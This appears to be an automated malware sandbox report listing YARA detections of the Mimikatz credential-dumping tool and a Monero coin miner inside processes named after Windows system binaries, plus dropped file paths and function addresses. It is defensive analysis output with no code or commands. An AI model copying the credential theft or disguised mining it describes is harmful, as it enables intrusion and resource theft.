      Source: 29.0.svchost.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.46.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.48.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.2.svchost.exe.517468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.43.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.42.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.20.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.2.ctfmon.exe.7d2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.53.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.45.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8d7468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.26.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8d7468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7d2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.2.ctfmon.exe.7c7468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.15.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.12.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.2.ctfmon.exe.787468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.2.dllhost.exe.2897468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7c7468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.2.svchost.exe.8e2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.42.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.23.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.28a2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.857468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.40.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.51.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.35.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.522c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.8.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.47.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.2.ctfmon.exe.750000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.9a2c68.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.45.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.29.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.2.ctfmon.exe.787468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.50.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.820000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.27.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.4e0000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.59.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e37468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.792c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.52.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.2.svchost.exe.522c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.23.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.2.svchost.exe.4b77268.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.2.svchost.exe.4b82a68.6.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.522c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8e2c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7d2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.8.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7d2c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2897468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.11.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.2.svchost.exe.8d7468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.12.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.792c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.2.dllhost.exe.2e37468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.9a2c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.522c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.2.SearchProtocolHost.exe.2fd7468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.57b7468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.39.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fa0000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.5780000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.50.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7c7468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.30.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.2.svchost.exe.8e2c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2860000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.16.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.862c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.19.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.56.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.862c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.55.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.51.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.7.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.33.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.787468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.37.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.2.svchost.exe.857468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.32.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.997468.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.517468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.44.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.4f42c68.56.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2897468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.2.svchost.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e37468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e42c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.2.ctfmon.exe.997468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.57.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.58.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.30.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.22.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.4f37468.32.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7c7468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.997468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.41.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.54.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 23.2.dllhost.exe.2897468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.10.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: C:\Windows\SysWOW64\WUDHostServices.exe, type: DROPPEDMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00266D3C0_2_00266D3C
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_002525100_2_00252510
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00253D700_2_00253D70
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_002526B00_2_002526B0
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_002536F00_2_002536F0
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00262B300_2_00262B30
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025AF520_2_0025AF52
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_002517C00_2_002517C0
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00262FDE0_2_00262FDE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD517C02_2_6FD517C0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD536F02_2_6FD536F0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD5F2F82_2_6FD5F2F8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD51E8D2_2_6FD51E8D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD526B02_2_6FD526B0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD525102_2_6FD52510
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD51C3E2_2_6FD51C3E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039A83C32_2_039A83C3
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0399D9702_2_0399D970
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0399C0DB2_2_0399C0DB
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0399A82A2_2_0399A82A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039A06592_2_039A0659
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC6402_2_039AC640
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0399DD882_2_0399DD88
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039A042A2_2_039A042A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0399D4742_2_0399D474
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096F4E015_2_0096F4E0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096D88015_2_0096D880
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097506315_2_00975063
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009832CF15_2_009832CF
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097DAF015_2_0097DAF0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096127015_2_00961270
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096C41015_2_0096C410
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00961C3E15_2_00961C3E
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00969D9015_2_00969D90
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096CD8015_2_0096CD80
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096DD1015_2_0096DD10
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096251015_2_00962510
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00961E8D15_2_00961E8D
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009626B015_2_009626B0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009636F015_2_009636F0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097DF9E15_2_0097DF9E
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00963FB015_2_00963FB0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009617C015_2_009617C0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097071015_2_00970710
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A1D0016_2_012A1D00
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0139ED0016_2_0139ED00
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129D91016_2_0129D910
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A016016_2_012A0160
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A0D6016_2_012A0D60
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0139E96016_2_0139E960
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012B297016_2_012B2970
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0135A14416_2_0135A144
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A055016_2_012A0550
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A81A016_2_012A81A0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01368DBA16_2_01368DBA
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129A98016_2_0129A980
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01397D9016_2_01397D90
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A259016_2_012A2590
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0134E5E016_2_0134E5E0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_013621E016_2_013621E0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012959C016_2_012959C0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012AADC016_2_012AADC0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012B51C016_2_012B51C0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0138683016_2_01386830
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129603016_2_01296030
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129980016_2_01299800
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A8C1016_2_012A8C10
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A746016_2_012A7460
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129C07016_2_0129C070
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0139306016_2_01393060
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A707016_2_012A7070
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A7C7016_2_012A7C70
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0136B06D16_2_0136B06D
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01391C4016_2_01391C40
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129F0A016_2_0129F0A0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A94A016_2_012A94A0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129ACB016_2_0129ACB0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012AF0B016_2_012AF0B0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0138649016_2_01386490
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0137B0E016_2_0137B0E0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A30D016_2_012A30D0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012B1CD016_2_012B1CD0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129B32016_2_0129B320
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012AFB2016_2_012AFB20
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0137B32016_2_0137B320
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129E33016_2_0129E330
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01359F1B16_2_01359F1B
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012AE37016_2_012AE370
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A4B5016_2_012A4B50
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012947A016_2_012947A0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012B03B016_2_012B03B0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0137079216_2_01370792
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129B78016_2_0129B780
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012ADF8016_2_012ADF80
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012AEB8016_2_012AEB80
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01396B8016_2_01396B80
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A5BE016_2_012A5BE0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A9FE016_2_012A9FE0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0139123016_2_01391230
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012B3A0016_2_012B3A00
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01386A0016_2_01386A00
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012ABA6016_2_012ABA60
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0138666016_2_01386660
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0139265016_2_01392650
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129C6B016_2_0129C6B0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A3EB016_2_012A3EB0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012A129016_2_012A1290
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012B4E9016_2_012B4E90
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0129CEE016_2_0129CEE0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01368EE616_2_01368EE6
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012ACAF016_2_012ACAF0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_012B0EF016_2_012B0EF0
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_013562C016_2_013562C0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FAF4E021_2_02FAF4E0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FBDAF021_2_02FBDAF0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FC32CF21_2_02FC32CF
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA127021_2_02FA1270
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FAD88021_2_02FAD880
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB506321_2_02FB5063
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA36F021_2_02FA36F0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA26B021_2_02FA26B0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA1E8D21_2_02FA1E8D
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA17C021_2_02FA17C0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA3FB021_2_02FA3FB0
